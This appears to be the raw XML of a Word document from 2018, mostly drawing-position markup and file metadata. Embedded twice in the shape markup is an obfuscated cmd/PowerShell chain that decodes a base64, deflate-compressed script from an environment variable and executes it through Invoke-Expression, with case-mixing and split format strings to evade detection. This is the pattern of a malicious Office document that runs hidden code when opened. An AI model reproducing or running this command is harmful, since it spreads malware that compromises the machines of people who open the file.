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AEEA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0" cy="16859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7575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="210185" cy="118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CMD cmD /c   "Set   vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+SKbbWIPvm+wLhItW4MgHZNNSgnYMbV/nMS6cq8aUeu8JV0EGW1lZA5E6N3Qtkwef/kwnf1TGC8mFBe7kkRNhFPWnQg2WgxtQS6743krRlK6xUFmzawRcSRXKEmo64i/vu+XoNiEKbsM9uTm1FMks9VORP6vVMGn+19aK1zXfAyka6rdPGzlQ6xSTt6qUroMnuMtQsplFcYSH94+YocXGxAj0cexAVT38iXttv4cJnACz3IQPRNFBs4WLpI7aILpnZ7/PKARGZsbr0vDdXJZwZe6i1rDLEn00B+gnwfSqsCz4HNhFcCeK8+XyCw=='),[sYStEM.io.cOMPRESSION.coMprESSionmoDE]::decompResS)^|%{NeW-OBjeCT Io.sTREamReADEr($_, [sySteM.tExt.ENcodINg]::aScIi) } ^| %{ $_.rEadTOENd( ) })^|inVOKe-EXpreSSioN&amp;&amp;POWerSHell   ${9`QP} =    [tyPE](  \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En')  ;  ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( (  ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL'  ).Invoke(  'VPN',(  \"{0}{1}{2}\"-f'pr','o','CESs'  )  )  ))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-71.25pt;mso-position-vertical-relative:text;margin-left:-7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CMD cmD /c   "Set   vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+SKbbWIPvm+wLhItW4MgHZNNSgnYMbV/nMS6cq8aUeu8JV0EGW1lZA5E6N3Qtkwef/kwnf1TGC8mFBe7kkRNhFPWnQg2WgxtQS6743krRlK6xUFmzawRcSRXKEmo64i/vu+XoNiEKbsM9uTm1FMks9VORP6vVMGn+19aK1zXfAyka6rdPGzlQ6xSTt6qUroMnuMtQsplFcYSH94+YocXGxAj0cexAVT38iXttv4cJnACz3IQPRNFBs4WLpI7aILpnZ7/PKARGZsbr0vDdXJZwZe6i1rDLEn00B+gnwfSqsCz4HNhFcCeK8+XyCw=='),[sYStEM.io.cOMPRESSION.coMprESSionmoDE]::decompResS)^|%{NeW-OBjeCT Io.sTREamReADEr($_, [sySteM.tExt.ENcodINg]::aScIi) } ^| %{ $_.rEadTOENd( ) })^|inVOKe-EXpreSSioN&amp;&amp;POWerSHell   ${9`QP} =    [tyPE](  \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En')  ;  ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( (  ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL'  ).Invoke(  'VPN',(  \"{0}{1}{2}\"-f'pr','o','CESs'  )  )  ))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6:48:00Z</dcterms:created>
  <dc:creator>Allison-PC</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-07T16:48:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>